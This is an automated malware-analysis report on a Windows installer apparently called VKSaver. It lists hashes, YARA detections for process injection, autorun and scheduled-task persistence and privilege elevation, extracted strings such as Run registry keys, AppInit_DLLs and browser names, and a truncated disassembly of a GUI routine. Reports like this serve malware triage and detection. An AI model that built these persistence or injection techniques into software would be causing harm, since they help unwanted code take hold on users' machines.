File Information — hashes and primary classification
File name
9aa75f19e736a06e7e1fa06f3ebff4caf14012add6f0d3624056e5278b083739
File size
654.0 KiB
Architecture
X86
- MD5
- cdd60d7161a5e773cda017aa193e2b08
- SHA1
- 024be88052355f54b0c9797816a58b848f7f1373
- SHA256
- 9aa75f19e736a06e7e1fa06f3ebff4caf14012add6f0d3624056e5278b083739
- TLSH
- T124e4cf09e1816898fd45f7714cb0281da0aade323afdaf1fd36d7071e2b43d12625a5e
- Imphash
- dca75897b2be15edc85c9566e029a0c2
- Rich header
- 6905f8c2c8f6182cccccda14862948af
Metadata — parser-extracted fields
YARA Signatures — 8 matching rules
Type.UNCOMMON
evasion
ProcessInjectionTargets
fingerprint
FingerprintSoftware
EnumerateProcesses
persistence
CreateScheduledTask
AutorunKey
lateral movement
ElevatePrivileges
RunShell
Type.INFO
compiler
MSVC_2012_linker
Kesakode — similarity verdict
Conficker
0.7%
Tidepool
0.7%
2 malware hits
0 library hits
308 clean hits
Anomalies — signals worth reviewing
entropy:
BigBufferNoXrefMediumToHighEntropy
code:
ManyHighValueImmediates
ManyUniqueImmediateBytes
SpaghettiFunction
StackArrayInitialisationX86
XorInLoop
integrity:
NoChecksum
sections:
SectionMostlyVirtual
UnbalancedVirtualPhysicalRatio
Constants — identified constants and patterns
crypto:
Rijndael_rcon__32_lil_40
1
Rijndael_Td0__0x51f4a750U___32_lil_1024
1
Rijndael_Td1__0x5051f4a7U___32_lil_1024
1
Rijndael_Td2__0xa75051f4U___32_lil_1024
1
Rijndael_Td3__0xf4a75051U___32_lil_1024
1
Rijndael_Td4__0x52525252U___32_lil_1024
1
Rijndael_Te0__0xc66363a5U___32_lil_1024
1
Rijndael_Te1__0xa5c66363U___32_lil_1024
1
Rijndael_Te2__0x63a5c663U___32_lil_1024
1
Rijndael_Te3__0x6363a5c6U___32_lil_1024
1
Rijndael_Te4__0x63636363U___32_lil_1024
1
guid:
IPersistFile
2
IBootTrigger
1
IExecAction
1
ILogonTrigger
1
IShellLinkW
1
ITaskService
1
registry:
HKEY_LOCAL_MACHINE
8
HKEY_CURRENT_USER
1
runtime:
msvc_date
1
msvc_domain_error
1
msvc_locale
1
msvc_name_unknown
1
msvc_r6002
1
msvc_r6008
1
msvc_r6009
1
msvc_r6010
1
msvc_r6016
1
msvc_r6017
1
msvc_r6018
1
msvc_r6019
1
msvc_r6024
1
msvc_r6025
1
msvc_r6026
1
msvc_r6027
1
msvc_r6028
1
msvc_r6031
1
msvc_r6032
1
msvc_r6033
1
msvc_r6034
1
msvc_rl
1
msvc_sing_error
1
msvc_tloss_error
1
Strings — highest-value extracted strings
| Address | String | Refs | Encoding | Score |
|---|---|---|---|---|
| 0x46B340 | SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VKSaver | 1 | UTF16 | 255 |
| 0x46B288 | SOFTWARE\Microsoft\Windows\CurrentVersion\Run | 1 | UTF16 | 255 |
| 0x46B3E8 | Software\Microsoft\Windows\CurrentVersion\Run | 1 | UTF16 | 255 |
| 0x46D4F0 | explorer.exe | 1 | UTF16 | 236 |
| 0x46B058 | iexplore.exe | 2 | UTF16 | 225 |
| 0x46B628 | SeDebugPrivilege | 3 | UTF16 | 208 |
| 0x46AF40 | DisplayName | 1 | UTF16 | 205 |
| 0x46AEB8 | Software\Microsoft\Windows\CurrentVersion\Uninstall\VKSaver | 1 | UTF16 | 196 |
| 0x46AD18 | Mb=Lk | 1 | ASCII | 190 |
| 0x46D3E8 | http://legal.yandex.ru/desktop_software_agreement/ | 1 | UTF16 | 189 |
| 0x46B1C8 | SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows | 1 | UTF16 | 188 |
| 0x46D450 | http://legal.yandex.ru/browser_agreement/ | 1 | UTF16 | 181 |
| 0x46AE20 | %s\Opera\Opera\operaprefs.ini | 1 | UTF16 | 176 |
| 0x46D3A8 | http://www.audiovkontakte.ru/ | 1 | UTF16 | 172 |
| 0x46AE5C | Software\Opera Software | 1 | UTF16 | 170 |
| 0x46D1A0 | --partner vksaver-elements --distr /quiet /msicl " | 1 | UTF16 | 169 |
| 0x46D16C | http://audiovkontakte.ru | 1 | UTF16 | 167 |
| 0x46D4DC | ntdll.dll | 1 | UTF16 | 162 |
| 0x46C988 | \downloader.exe | 1 | UTF16 | 159 |
| 0x46B50C | Uninstall.lnk | 1 | UTF16 | 159 |
| 0x46B5B0 | vkontakte.ru .vkontakte.ru *.vkontakte.ru vk.com .vk.com *.vk.com audiovkontakte.ru v.audiovkontakte.ru | 1 | ASCII | 155 |
| 0x46D538 | totalcmd64.exe | 1 | UTF16 | 154 |
| 0x46D770 | \vksaver3.dll | 1 | UTF16 | 154 |
| 0x46C960 | http://vk.com | 1 | UTF16 | 154 |
| 0x46D51C | totalcmd.exe | 1 | UTF16 | 154 |
| 0x46D4A4 | riched20.dll | 1 | UTF16 | 154 |
| 0x46D70C | vksaver3.dll | 1 | UTF16 | 154 |
| 0x46B0E8 | maxthon.exe | 1 | UTF16 | 154 |
| 0x40EA50 | mscoree.dll | 1 | UTF16 | 154 |
| 0x46D728 | VKSaver.exe | 1 | UTF16 | 154 |
| 0x46D758 | readme.txt | 1 | UTF16 | 154 |
| 0x46B484 | Launch VKSaver.lnk | 1 | UTF16 | 153 |
| 0x46ADB4 | SOFTWARE\Microsoft\Cryptography | 1 | ASCII | 152 |
| 0x46B074 | firefox.exe | 2 | UTF16 | 152 |
| 0x46B564 | \operaprefs_fixed.ini | 1 | ASCII | 152 |
| 0x46B684 | Microsoft Internet Explorer | 1 | UTF16 | 150 |
| 0x46B4D0 | Readme.lnk | 1 | UTF16 | 150 |
| 0x46D50C | far.exe | 1 | UTF16 | 150 |
| 0x46B64C | vksaver.exe | 2 | UTF16 | 149 |
| 0x46B0D0 | browser.exe | 3 | UTF16 | 149 |
| 0x46B444 | \VKSaver.lnk | 1 | UTF16 | 148 |
| 0x46B460 | VKSaver.lnk | 1 | UTF16 | 147 |
| 0x46B0B8 | safari.exe | 2 | UTF16 | 146 |
| 0x46B0A0 | chrome.exe | 2 | UTF16 | 146 |
| 0x46D740 | config.dat | 1 | UTF16 | 146 |
| 0x46B08C | opera.exe | 2 | UTF16 | 146 |
| 0x40F414 | Runtime Error!\n\nProgram: | 1 | UTF16 | 144 |
| 0x46B304 | SOFTWARE\VKSaver | 2 | UTF16 | 144 |
| 0x46E4CC | CreateToolhelp32Snapshot | 0 | ASCII | 144 |
| 0x46AF9C | UninstallString | 1 | UTF16 | 143 |
| 0x411DFC | USER32.DLL | 2 | UTF16 | 142 |
| 0x46B190 | NT AUTHORITY\SYSTEM | 1 | UTF16 | 141 |
| 0x46D12C | msctls_progress32 | 1 | UTF16 | 141 |
| 0x46B120 | AudioVkontakte.ru | 1 | UTF16 | 141 |
| 0x46D558 | vksaver-install | 1 | UTF16 | 141 |
| 0x40E53C | GetLogicalProcessorInformation | 1 | ASCII | 140 |
| 0x46AE8C | Last CommandLine v2 | 1 | UTF16 | 139 |
| 0x40E520 | GetCurrentProcessorNumber | 1 | ASCII | 139 |
| 0x40E570 | SetDefaultDllDirectories | 1 | ASCII | 139 |
| 0x40E46C | WaitForThreadpoolTimerCallbacks | 1 | ASCII | 138 |
| 0x46B2E4 | VKSaverUpdater | 1 | UTF16 | 138 |
| 0x40E3F8 | InitializeCriticalSectionEx | 1 | ASCII | 138 |
| 0x40E428 | SetThreadStackGuarantee | 1 | ASCII | 138 |
| 0x46B618 | -popup | 1 | UTF16 | 138 |
| 0x40E500 | FreeLibraryWhenCallbackReturns | 1 | ASCII | 137 |
| 0x46AF7C | "%s" -uninstall | 1 | UTF16 | 136 |
| 0x46B010 | DisplayVersion | 1 | UTF16 | 136 |
| 0x46D150 | SysListView32 | 1 | UTF16 | 136 |
| 0x40E4E4 | FlushProcessWriteBuffers | 1 | ASCII | 136 |
| 0x46E85C | AdjustTokenPrivileges | 0 | ASCII | 136 |
| 0x46ADF8 | VKSaverInstallerMtx | 3 | UTF16 | 135 |
| 0x46D580 | audiovkontakte.ru | 2 | UTF16 | 135 |
| 0x411E60 | GetProcessWindowStation | 1 | ASCII | 135 |
| 0x40E440 | CreateThreadpoolTimer | 1 | ASCII | 135 |
| 0x46B528 | -uninstall | 1 | UTF16 | 135 |
| 0x46EA48 | ShellExecuteW | 0 | ASCII | 135 |
| 0x40E5E0 | GetUserDefaultLocaleName | 1 | ASCII | 134 |
| 0x46D4C0 | NtQuerySystemInformation | 1 | ASCII | 134 |
| 0x40E4A4 | CreateThreadpoolWait | 1 | ASCII | 134 |
| 0x40E48C | CloseThreadpoolTimer | 1 | ASCII | 134 |
| 0x46B044 | %s_%u.tmp | 2 | UTF16 | 134 |
| 0x46B664 | - Apple Safari | 1 | UTF16 | 133 |
| 0x46D21C | YAHOMEPAGE=y | 1 | UTF16 | 133 |
| 0x46D2C4 | YBSENDSTAT=n | 1 | UTF16 | 133 |
| 0x46D2A8 | YBSENDSTAT=y | 1 | UTF16 | 133 |
| 0x46D238 | YAHOMEPAGE=n | 1 | UTF16 | 133 |
| 0x411E44 | GetUserObjectInformationW | 1 | ASCII | 133 |
| 0x46AFF8 | %d.%d.%d.%d | 1 | UTF16 | 133 |
| 0x46B030 | %s%u.tmp | 2 | UTF16 | 133 |
| 0x46E4A8 | Process32NextW | 0 | ASCII | 133 |
| 0x46B328 | Install_Dir | 1 | UTF16 | 132 |
| 0x46CA38 | RichEdit20W | 1 | UTF16 | 132 |
| 0x46D78C | -vk2kill | 1 | UTF16 | 132 |
| 0x46C9B8 | Static | 1 | UTF16 | 132 |
| 0x46ADD4 | VKSaverInstallWnd | 3 | UTF16 | 131 |
| 0x46B264 | LoadAppInit_DLLs | 2 | UTF16 | 131 |
| 0x46B104 | -autoupdate | 2 | UTF16 | 131 |
| 0x40E458 | SetThreadpoolTimer | 1 | ASCII | 131 |
| 0x40E414 | CreateSemaphoreExW | 1 | ASCII | 131 |
| 0x46CE1E | <a href="http://legal.yandex.ru/desktop_software_agreement/"> | 0 | UTF16 | 130 |
| 0x40E620 | GetCurrentPackageId | 1 | ASCII | 130 |
| 0x40E4D0 | CloseThreadpoolWait | 1 | ASCII | 130 |
| 0x46D2E0 | YABROWSER=n | 1 | UTF16 | 129 |
| 0x46D270 | YAQSEARCH=n | 1 | UTF16 | 129 |
| 0x46D254 | YAQSEARCH=y | 1 | UTF16 | 129 |
| 0x46D28C | YABROWSER=y | 1 | UTF16 | 129 |
| 0x46AF64 | DisplayIcon | 1 | UTF16 | 129 |
| 0x46D7A0 | -newupdate | 1 | UTF16 | 129 |
| 0x411E30 | GetLastActivePopup | 1 | ASCII | 129 |
| 0x40E4BC | SetThreadpoolWait | 1 | ASCII | 129 |
| 0x40E5FC | IsValidLocaleName | 1 | ASCII | 129 |
| 0x40E5B0 | GetDateFormatEx | 1 | ASCII | 129 |
| 0x46FD84 | VKSaverUpdate | 4 | UTF16 | 128 |
| 0x46B6DC | Opera browser | 3 | UTF16 | 128 |
| 0x46B6F8 | Google Chrome | 3 | UTF16 | 128 |
| 0x46B234 | AppInit_DLLs | 3 | UTF16 | 128 |
| 0x40E58C | EnumSystemLocalesEx | 1 | ASCII | 128 |
| 0x46D208 | ILIGHT=1 | 1 | UTF16 | 128 |
| 0x46AFE4 | Publisher | 1 | UTF16 | 128 |
| 0x40E3D8 | FlsFree | 1 | ASCII | 128 |
| 0x40E5D0 | GetTimeFormatEx | 1 | ASCII | 127 |
| 0x411E20 | GetActiveWindow | 1 | ASCII | 127 |
| 0x40EA68 | CorExitProcess | 1 | ASCII | 127 |
| 0x40E3CC | FlsAlloc | 1 | ASCII | 127 |
| 0x46B6BC | Mozilla Firefox | 2 | UTF16 | 126 |
| 0x46B750 | Maxthon browser | 3 | UTF16 | 126 |
| 0x411E78 | CONOUT$ | 1 | UTF16 | 126 |
| 0x46B730 | Yandex browser | 3 | UTF16 | 125 |
| 0x40E55C | CreateSymbolicLinkW | 1 | ASCII | 125 |
| 0x46B59C | vkontakte.ru | 1 | ASCII | 125 |
| 0x40E3E0 | FlsGetValue | 1 | ASCII | 125 |
| 0x40E3EC | FlsSetValue | 1 | ASCII | 125 |
| 0x411E14 | MessageBoxW | 1 | ASCII | 125 |
| 0x46B1B8 | runas | 1 | UTF16 | 125 |
| 0x46C94C | open | 1 | UTF16 | 125 |
| 0x46C97C | %x%x | 1 | UTF16 | 125 |
| 0x46B714 | Apple Safari | 3 | UTF16 | 124 |
| 0x40E5C0 | GetLocaleInfoEx | 1 | ASCII | 124 |
| 0x46B254 | vksaver | 2 | UTF16 | 124 |
| 0x46C9E8 | Button | 18 | UTF16 | 124 |
| 0x46C9A8 | Tahoma | 3 | UTF16 | 124 |
| 0x46D088 | <a href="http://legal.yandex.ru/browser_agreement/"> | 0 | UTF16 | 122 |
| 0x46B57C | Opera Turbo bypass URLs | 2 | ASCII | 122 |
| 0x40E5A0 | CompareStringEx | 1 | ASCII | 122 |
| 0x46ADA8 | MachineGuid | 1 | ASCII | 122 |
| 0x46B3C0 | \VKSaver | 2 | UTF16 | 119 |
| 0x46FDA0 | VKSaver | 2 | UTF16 | 119 |
| 0x46CED0 | SysLink | 2 | UTF16 | 119 |
| 0x46AF30 | VKSaver | 3 | UTF16 | 119 |
| 0x46B3D4 | "%s" %s | 2 | UTF16 | 119 |
| 0x40E610 | LCMapStringEx | 1 | ASCII | 119 |
| 0x4E54E3 | <?xml version="1.0" encoding="UTF-8" standalone="yes"?>\r\n<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifes... | 0 | ASCII | 118 |
| 0x46E018 | KERNEL32.DLL | 1 | ASCII | 118 |
| 0x46B478 | %s\%s | 4 | UTF16 | 117 |
| 0x40E65C | ko-KR | 3 | UTF16 | 117 |
| 0x46CA2C | Arial | 3 | UTF16 | 117 |
| 0x46AF58 | "%s" | 2 | UTF16 | 117 |
| 0x46E060 | PSAPI.DLL | 1 | ASCII | 116 |
| 0x46E049 | ole32.dll | 1 | ASCII | 116 |
| 0x46E025 | ADVAPI32.dll | 1 | ASCII | 115 |
| 0x46E032 | COMCTL32.dll | 1 | ASCII | 115 |
| 0x46E06A | SHELL32.dll | 1 | ASCII | 115 |
| 0x46E08D | WS2_32.dll | 1 | ASCII | 115 |
| 0x46E053 | OLEAUT32.dll | 1 | ASCII | 112 |
| 0x46E081 | VERSION.dll | 1 | ASCII | 112 |
| 0x46E076 | USER32.dll | 1 | ASCII | 112 |
| 0x46E03F | GDI32.dll | 1 | ASCII | 112 |
| 0x40F87A | h(((( H | 2 | UTF16 | 111 |
| 0x40F2E0 | runtime error | 1 | UTF16 | 110 |
| 0x40E668 | zh-TW | 3 | UTF16 | 110 |
| 0x40E650 | zh-CN | 3 | UTF16 | 110 |
| 0x46B594 | Proxy | 2 | ASCII | 109 |
| 0x411298 | sr-SP-Cyrl | 1 | UTF16 | 107 |
| 0x41141C | sr-BA-Cyrl | 1 | UTF16 | 107 |
| 0x410F48 | et-EE | 1 | UTF16 | 104 |
| 0x4114DC | en-TT | 1 | UTF16 | 104 |
| 0x4111BC | nn-NO | 1 | UTF16 | 104 |
| 0x411038 | kk-KZ | 1 | UTF16 | 104 |
| 0x411074 | tt-RU | 1 | UTF16 | 104 |
| 0x4111D4 | sr-SP-Latn | 1 | UTF16 | 103 |
| 0x411378 | bs-BA-Latn | 1 | UTF16 | 103 |
| 0x4113D0 | sr-BA-Latn | 1 | UTF16 | 103 |
| 0x410F90 | az-AZ-Latn | 1 | UTF16 | 103 |
| 0x411468 | sms-FI | 1 | UTF16 | 103 |
| 0x411110 | kok-IN | 1 | UTF16 | 103 |
| 0x46D8F8 | C:\_dev\vksaver\BuildOutput\vksaver-install.pdb | 0 | ASCII | 101 |
| 0x4111F8 | az-AZ-Cyrl | 1 | UTF16 | 100 |
| 0x41105C | uz-UZ-Latn | 1 | UTF16 | 100 |
| 0x411228 | uz-UZ-Cyrl | 1 | UTF16 | 100 |
| 0x4D8031 | @JJ7?4@?Q@00474@4K?Q@??J@+@@0@@@X0-?J-?Q@70@@-?@@4@?4Q4@J74Q?,K?0Q-0@4?0@0@@@?@7?4@?050????05??0???J???0????0?0?0????... | 0 | ASCII | 97 |
| 0x4D892A | "<D///>//D/>>DD//////D>//>D//D>D/>>D//////D>D>//DD>>D///>/D>/D>//D>///>D/D>////D>D>/D//D///D>//D//PTlm")?>D///D///>D>... | 0 | ASCII | 97 |
| 0x4C9AAC | o<<<<<<E<<<<<<<<<<<P&:<<<<<<<E<<E<E<E<<<<<E<<<<<<<<<<<<<<5/3P5<<<<<<<<<<<<<<<<<<<<<<<E<E<E<E<<<<E<<<P)1:5<<<<<<<<3CP<... | 0 | ASCII | 97 |
| 0x40F3B6 | @R6002\r\n- floating point support not loaded\r\n | 0 | UTF16 | 97 |
| 0x411390 | smj-SE | 1 | UTF16 | 97 |
| 0x4113E8 | sma-NO | 1 | UTF16 | 97 |
| 0x411434 | sma-SE | 1 | UTF16 | 97 |
| 0x41149C | smn-FI | 1 | UTF16 | 97 |
| 0x411320 | smj-NO | 1 | UTF16 | 97 |
| 0x411120 | syr-SY | 1 | UTF16 | 97 |
| 0x411130 | div-MV | 1 | UTF16 | 97 |
| 0x4114AC | ar-SY | 1 | UTF16 | 97 |
| 0x410E1C | de-DE | 1 | UTF16 | 97 |
| 0x410E28 | el-GR | 1 | UTF16 | 97 |
| 0x410E34 | fi-FI | 1 | UTF16 | 97 |
| 0x410E40 | fr-FR | 1 | UTF16 | 97 |
| 0x410E4C | he-IL | 1 | UTF16 | 97 |
| 0x410E58 | hu-HU | 1 | UTF16 | 97 |
| 0x410E64 | is-IS | 1 | UTF16 | 97 |
| 0x410E70 | it-IT | 1 | UTF16 | 97 |
| 0x410E7C | nl-NL | 1 | UTF16 | 97 |
| 0x410E88 | nb-NO | 1 | UTF16 | 97 |
| 0x411180 | en-GB | 1 | UTF16 | 97 |
| 0x410E94 | pl-PL | 1 | UTF16 | 97 |
| 0x410EA0 | pt-BR | 1 | UTF16 | 97 |
| 0x410EAC | ro-RO | 1 | UTF16 | 97 |
| 0x4111B0 | nl-BE | 1 | UTF16 | 97 |
| 0x410EB8 | ru-RU | 1 | UTF16 | 97 |
| 0x410EC4 | hr-HR | 1 | UTF16 | 97 |
| 0x4111A4 | it-CH | 1 | UTF16 | 97 |
| 0x410ED0 | sk-SK | 1 | UTF16 | 97 |
| 0x410EDC | sq-AL | 1 | UTF16 | 97 |
| 0x411198 | fr-BE | 1 | UTF16 | 97 |
| 0x410EE8 | sv-SE | 1 | UTF16 | 97 |
| 0x410EF4 | th-TH | 1 | UTF16 | 97 |
| 0x410F00 | tr-TR | 1 | UTF16 | 97 |
| 0x410F0C | ur-PK | 1 | UTF16 | 97 |
| 0x410F18 | id-ID | 1 | UTF16 | 97 |
| 0x410F24 | uk-UA | 1 | UTF16 | 97 |
| 0x410F30 | be-BY | 1 | UTF16 | 97 |
| 0x411008 | hi-IN | 1 | UTF16 | 97 |
| 0x410F3C | sl-SI | 1 | UTF16 | 97 |
| 0x410F54 | lv-LV | 1 | UTF16 | 97 |
| 0x410F60 | lt-LT | 1 | UTF16 | 97 |
| 0x410F6C | fa-IR | 1 | UTF16 | 97 |
| 0x410F78 | vi-VN | 1 | UTF16 | 97 |
| 0x410F84 | hy-AM | 1 | UTF16 | 97 |
| 0x410FA8 | eu-ES | 1 | UTF16 | 97 |
| 0x410FB4 | mk-MK | 1 | UTF16 | 97 |
| 0x410FC0 | tn-ZA | 1 | UTF16 | 97 |
| 0x410FCC | xh-ZA | 1 | UTF16 | 97 |
| 0x410FE4 | af-ZA | 1 | UTF16 | 97 |
| 0x410FF0 | ka-GE | 1 | UTF16 | 97 |
| 0x410FFC | fo-FO | 1 | UTF16 | 97 |
| 0x411014 | mt-MT | 1 | UTF16 | 97 |
| 0x411020 | se-NO | 1 | UTF16 | 97 |
| 0x4113AC | en-IE | 1 | UTF16 | 97 |
| 0x4113B8 | es-PA | 1 | UTF16 | 97 |
| 0x4113C4 | fr-MC | 1 | UTF16 | 97 |
| 0x4113F8 | ar-TN | 1 | UTF16 | 97 |
| 0x411404 | en-ZA | 1 | UTF16 | 97 |
| 0x411410 | es-DO | 1 | UTF16 | 97 |
| 0x41136C | fr-LU | 1 | UTF16 | 97 |
| 0x411444 | ar-OM | 1 | UTF16 | 97 |
| 0x411450 | en-JM | 1 | UTF16 | 97 |
| 0x41145C | es-VE | 1 | UTF16 | 97 |
| 0x4113A0 | ar-MA | 1 | UTF16 | 97 |
Functions — high-value functions
Function listings
0x404DC0 sub_404dc0 str 50 api 49 imm 75 Unknown
sub_404dc0() {
push ebp
mov ebp, esp
and esp, 0xFFFFFFF0
sub esp, 0x88
mov eax, [0x46F000]
xor eax, esp
mov [esp+0x84], eax
mov ecx, [ebp+0x0C]
push esi
mov esi, [ebp+0x08]
push edi
mov edi, [ebp+0x14]
mov [esp+0x10], esi
mov [esp+0x14], edi
cmp ecx, 0x4E
jnbe .11
jz .6
mov eax, ecx
dec eax
jz .2
dec eax
jz .1
sub eax, 0x0D
jnz .12
lea eax, [esp+0x48]
push eax
push esi
call [user32.BeginPaint]
mov ecx, eax
call sub_4042c0()
lea eax, [esp+0x48]
push eax
push esi
call [user32.EndPaint]
push edi
push [ebp+0x10]
push 0x0F
push esi
call [user32.DefWindowProcW]
pop edi
pop esi
mov ecx, [esp+0x84]
xor ecx, esp
call sub_406beb()
mov esp, ebp
pop ebp
ret 0x10
.1:
push 0x00
call [user32.PostQuitMessage]
xor eax, eax
pop edi
pop esi
mov ecx, [esp+0x84]
xor ecx, esp
call sub_406beb()
mov esp, ebp
pop ebp
ret 0x10
.2:
push "Tahoma"
push 0x00
push 0x05
push 0x00
push 0x00
push 0x01
push 0x00
push 0x00
push 0x00
push 0x190
push 0x00
push 0x00
push 0x00
push 0x0D
call [gdi32.CreateFontW]
push "Tahoma"
push 0x00
push 0x05
push 0x00
push 0x00
push 0x01
push 0x00
push 0x00
push 0x00
push 0x2BC
push 0x00
push 0x00
push 0x00
push 0x0D
mov [0x4B14A0], eax
call [gdi32.CreateFontW]
push 0x00
push [0x4B2010]
mov [0x4B14A4], eax
push 0x00
push esi
push 0x02
push 0x1C0
push 0x139
push 0x18
push 0x50000000
push 0x00
push "Static"
push 0x20000
call [user32.CreateWindowExW]
mov eax, [0x4B1044]
push 0x00
cmp eax, 0xC8
jnz .3
push [0x4B2010]
push 0x00
push esi
push 0x18
push 0xAA
push 0x148
push 0xDC
push 0x50010001
push 0x46C9C8
push "Button"
push 0x00
call [user32.CreateWindowExW]
push 0x00
push [0x4B2010]
mov [0x4B1484], eax
push 0x00
push esi
push 0x18
push 0x4B
push 0x148
push 0x190
push 0x50010000
push 0x46C9F8
push "Button"
push 0x00
call [user32.CreateWindowExW]
mov esi, [user32.SendMessageW]
push 0x00
push [0x4B14A0]
mov [0x4B1480], eax
push 0x30
push [0x4B1484]
call esi
push 0x00
push [0x4B14A0]
push 0x30
push [0x4B1480]
call esi
mov esi, [esp+0x10]
push edi
push [ebp+0x10]
push 0x01
push esi
call [user32.DefWindowProcW]
pop edi
pop esi
mov ecx, [esp+0x84]
xor ecx, esp
call sub_406beb()
mov esp, ebp
pop ebp
ret 0x10
.3:
cmp eax, 0x64
jnz .5
push [0x4B2010]
push 0x00
push esi
push 0x18
push eax
push 0x148
push 0x122
push 0x50010001
push 0x46CA04
push "Button"
push 0x00
call [user32.CreateWindowExW]
push 0x00
push [0x4B2010]
mov [0x4B1484], eax
push 0x00
push esi
push 0x18
push 0x4B
push 0x148
push 0x190
push 0x50010000
push 0x46CA1C
push "Button"
push 0x00
call [user32.CreateWindowExW]
push 0x40
push 0x10
push 0x10
push 0x01
push 0x86
push [0x4B2010]
mov [0x4B1480], eax
call [user32.LoadImageW]
mov esi, [user32.SendMessageW]
push eax
push 0x01
push 0xF7
push [0x4B1484]
call esi
push 0x00
push [0x4B14A0]
push 0x30
push [0x4B1484]
call esi
push 0x00
push [0x4B14A0]
push 0x30
push [0x4B1480]
call esi
mov esi, [esp+0x10]
push edi
push [ebp+0x10]
push 0x01
push esi
; listing truncated
/* DISPLAY WARNING: Type casts are NOT being printed */
void sub_404dc0(int32_t *param_1,undefined *param_2,undefined4 param_3,int32_t *param_4)
{
int16_t *piVar1;
undefined auVar2 [12];
uint32_t uVar3;
undefined auVar4 [12];
code *pcVar5;
char cVar6;
undefined4 uVar7;
int32_t iVar8;
undefined4 *puVar9;
undefined4 *puVar10;
undefined4 uVar11;
undefined auStack_750 [4];
undefined auStack_74c [12];
undefined auStack_740 [12];
undefined4 uStack_734;
undefined4 uStack_730;
undefined4 uStack_72c;
undefined4 uStack_728;
undefined4 uStack_724;
undefined4 uStack_720;
undefined4 uStack_71c;
undefined4 uStack_718;
undefined4 uStack_714;
undefined4 uStack_710;
undefined4 uStack_70c;
uint32_t uStack_708;
undefined4 uStack_704;
undefined4 uStack_700;
undefined4 uStack_6fc;
undefined4 uStack_6f8;
undefined4 uStack_6f4;
undefined4 uStack_6f0;
undefined4 uStack_6ec;
undefined4 uStack_6e8;
undefined4 uStack_6e4;
undefined4 uStack_6e0;
undefined4 uStack_6dc;
undefined4 uStack_6d8;
undefined4 uStack_6d4;
undefined4 uStack_6d0;
undefined4 uStack_6cc;
undefined4 uStack_6c8;
undefined4 uStack_6c4;
undefined4 uStack_6c0;
undefined4 uStack_6bc;
undefined4 uStack_6b8;
undefined4 uStack_6b4;
undefined4 uStack_6b0;
undefined4 uStack_6ac;
undefined4 uStack_6a8;
undefined4 uStack_6a4;
undefined4 uStack_6a0;
undefined4 uStack_69c;
undefined4 uStack_698;
undefined4 uStack_694;
undefined4 uStack_690;
undefined4 uStack_68c;
undefined4 uStack_688;
undefined4 uStack_684;
undefined4 uStack_680;
undefined4 uStack_67c;
undefined4 uStack_678;
undefined4 uStack_674;
undefined4 uStack_670;
undefined4 uStack_66c;
undefined4 uStack_668;
undefined4 uStack_664;
undefined4 uStack_660;
undefined4 uStack_65c;
undefined4 uStack_658;
undefined4 uStack_654;
undefined4 uStack_650;
undefined4 uStack_64c;
uint32_t uStack_648;
undefined4 uStack_644;
undefined4 uStack_640;
undefined4 uStack_63c;
undefined4 uStack_638;
undefined4 uStack_634;
undefined4 uStack_630;
undefined4 uStack_62c;
undefined4 uStack_628;
undefined4 uStack_624;
undefined4 uStack_620;
undefined4 uStack_61c;
uint32_t uStack_618;
undefined4 uStack_614;
undefined4 uStack_610;
undefined4 uStack_60c;
undefined4 uStack_608;
undefined4 uStack_604;
undefined4 uStack_600;
undefined4 uStack_5fc;
undefined4 uStack_5f8;
undefined4 uStack_5f4;
undefined4 uStack_5f0;
undefined4 uStack_5ec;
uint32_t uStack_5e8;
undefined4 uStack_5e4;
undefined4 uStack_5e0;
undefined4 uStack_5dc;
undefined4 uStack_5d8;
undefined4 uStack_5d4;
undefined4 uStack_5d0;
undefined4 uStack_5cc;
undefined4 uStack_5c8;
undefined4 uStack_5c4;
undefined4 uStack_5c0;
undefined4 uStack_5bc;
undefined4 uStack_5b8;
undefined4 uStack_5b4;
undefined4 uStack_5b0;
undefined4 uStack_5ac;
undefined4 uStack_5a8;
undefined4 uStack_5a4;
undefined4 uStack_5a0;
undefined4 uStack_59c;
undefined4 uStack_598;
undefined4 uStack_594;
undefined4 uStack_590;
undefined4 uStack_58c;
undefined4 uStack_588;
undefined4 uStack_584;
undefined4 uStack_580;
undefined4 uStack_57c;
undefined4 uStack_578;
undefined4 uStack_574;
undefined4 uStack_570;
undefined4 uStack_56c;
undefined4 uStack_568;
undefined4 uStack_564;
undefined4 uStack_560;
undefined4 uStack_55c;
uint32_t uStack_558;
undefined4 uStack_554;
undefined4 uStack_550;
undefined4 uStack_54c;
undefined4 uStack_548;
undefined4 uStack_544;
undefined4 uStack_540;
undefined4 uStack_53c;
undefined4 uStack_538;
undefined4 uStack_534;
undefined4 uStack_530;
undefined4 uStack_52c;
uint32_t uStack_528;
undefined4 uStack_524;
undefined4 uStack_520;
undefined4 uStack_51c;
undefined4 uStack_518;
undefined4 uStack_514;
undefined4 uStack_510;
undefined4 uStack_50c;
undefined4 uStack_508;
undefined4 uStack_504;
undefined4 uStack_500;
undefined4 uStack_4fc;
uint32_t uStack_4f8;
undefined4 uStack_4f4;
undefined4 uStack_4f0;
undefined4 uStack_4ec;
undefined4 uStack_4e8;
undefined4 uStack_4e4;
undefined4 uStack_4e0;
undefined4 uStack_4dc;
undefined4 uStack_4d8;
undefined4 uStack_4d4;
undefined4 uStack_4d0;
undefined4 uStack_4cc;
uint32_t uStack_4c8;
undefined4 uStack_4c4;
undefined4 uStack_4c0;
undefined4 uStack_4bc;
undefined4 uStack_4b8;
undefined4 uStack_4b4;
undefined4 uStack_4b0;
undefined4 uStack_4ac;
undefined4 uStack_4a8;
undefined4 uStack_4a4;
undefined4 uStack_4a0;
undefined4 uStack_49c;
uint32_t uStack_498;
undefined4 uStack_494;
undefined4 uStack_490;
undefined4 uStack_48c;
undefined4 uStack_488;
undefined4 uStack_484;
undefined4 uStack_480;
undefined4 uStack_47c;
undefined4 uStack_478;
undefined4 uStack_474;
undefined4 uStack_470;
undefined4 uStack_46c;
uint32_t uStack_468;
undefined4 uStack_464;
undefined4 uStack_460;
undefined4 uStack_45c;
undefined4 uStack_458;
undefined4 uStack_454;
undefined4 uStack_450;
undefined4 uStack_44c;
undefined4 uStack_448;
undefined4 uStack_444;
undefined4 uStack_440;
undefined4 uStack_43c;
undefined4 uStack_438;
undefined4 uStack_434;
undefined4 uStack_430;
undefined4 uStack_42c;
undefined4 uStack_428;
undefined4 uStack_424;
undefined4 uStack_420;
undefined4 uStack_41c;
undefined4 uStack_418;
/* listing truncated */
